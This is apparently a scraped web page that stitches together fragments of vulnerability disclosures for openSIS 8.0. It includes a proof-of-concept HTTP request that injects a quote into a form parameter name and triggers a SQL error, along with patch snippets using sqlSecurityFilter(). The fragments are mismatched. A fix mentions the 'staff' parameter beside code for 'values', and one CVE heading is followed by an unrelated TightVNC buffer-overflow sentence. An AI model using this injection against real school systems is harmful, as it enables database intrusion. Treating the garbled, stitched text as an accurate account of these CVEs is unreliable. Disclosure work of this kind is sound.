Use function sqlSecurityFilter() before assign $\_REQUEST\['staff'\] to $value param.

 $staffs=sqlSecurityFilter($_REQUEST['staff']);
 foreach ($staffs as $column => $value) {
 if ($column == 'BIRTHDATE' && $value!='')
 {
 $value = date("Y-m-d", strtotime($value));
 
 }

CVE-2021-41678: SQL injection in function STAFF.PHP · Issue #203 · OS4ED/openSIS-Classic

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/functions/GetStuListFnc.php &Grade= parameter.

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/grades/EditHistoryMarkingPeriods.php, values\[new\]\[MP\_TYPE\]= parameter.

![image](https://user-images.githubusercontent.com/65946483/134319492-9110c6fc-ce57-4a24-9ca4-504809fdad3b.png)

POC:

![image](https://user-images.githubusercontent.com/65946483/134319819-f1c8c782-67e7-4e7b-a768-b3a06bc48bfd.png)

REQUEST:

 POST /Modules.php?modname=grades/EditHistoryMarkingPeriods.php&modfunc=update&tab_id=&mp_id= HTTP/1.1
 Host: 192.168.21.130
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 225
 Origin: http://192.168.21.130
 Connection: close
 Referer: http://192.168.21.130/Modules.php?modname=eligibility/TeacherCompletion.php&LO_direction=1&portal_search=true&LO_search=
 Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
 Upgrade-Insecure-Requests: 1
 
 values[new][MP_'TYPE]=year&values%5Bnew%5D%5BNAME%5D=q&month_values%5Bnew%5D%5BPOST_END_DATE%5D=09&day_values%5Bnew%5D%5BPOST_END_DATE%5D=01&year_values%5Bnew%5D%5BPOST_END_DATE%5D=2021&values%5Bnew%5D%5BSYEAR%5D=2008
 

RESPONSE:

 HTTP/1.1 200 OK
 Date: Wed, 22 Sep 2021 05:39:16 GMT
 Server: Apache/2.4.46 (Debian)
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate
 Pragma: no-cache
 Vary: Accept-Encoding
 Content-Length: 60208
 Connection: close
 Content-Type: text/html; charset=UTF-8
 
 […]
 		<pre> DB Execute Failed </pre></TD>
 		</TR><TR>
 			<TD align=right>SQL:</TD>
 			<TD>INSERT INTO history_marking_periods (MARKING_PERIOD_ID, SCHOOL_ID, MP_'TYPE,NAME,SYEAR,POST_END_DATE) values(40, 1, 'year','q','2008','2021-09-01')</TD>
 		</TR>
 		</TR><TR>
 			<TD align=right>Traceback:</TD>
 			<TD>/var/www/opensis/modules/grades/EditHistoryMarkingPeriods.php at 92</TD>
 		</TR>
 		</TR><TR>
 			<TD align=right>Additional Information:</TD>
 			<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''TYPE,NAME,SYEAR,POST_END_DATE) values(40, 1, 'year','q','2008','2021-09-01')' at line 1</TD>
 		</TR>
 
 […]
 

SOLUTION:

 Use function sqlSecurityFilter() before foreach variable $_REQUEST['staff'].
 
 `foreach (sqlSecurityFilter($_REQUEST['values']) as $id => $columns)`

CVE-2021-41677: SQL injection in multiple functions · Issue #202 · OS4ED/openSIS-Classic

Buffer Overflow vulnerability in tvnviewer.exe of TightVNC Viewer allows a remote attacker to execute arbitrary instructions via a crafted FramebufferUpdate packet from a VNC server.

Tag

#debian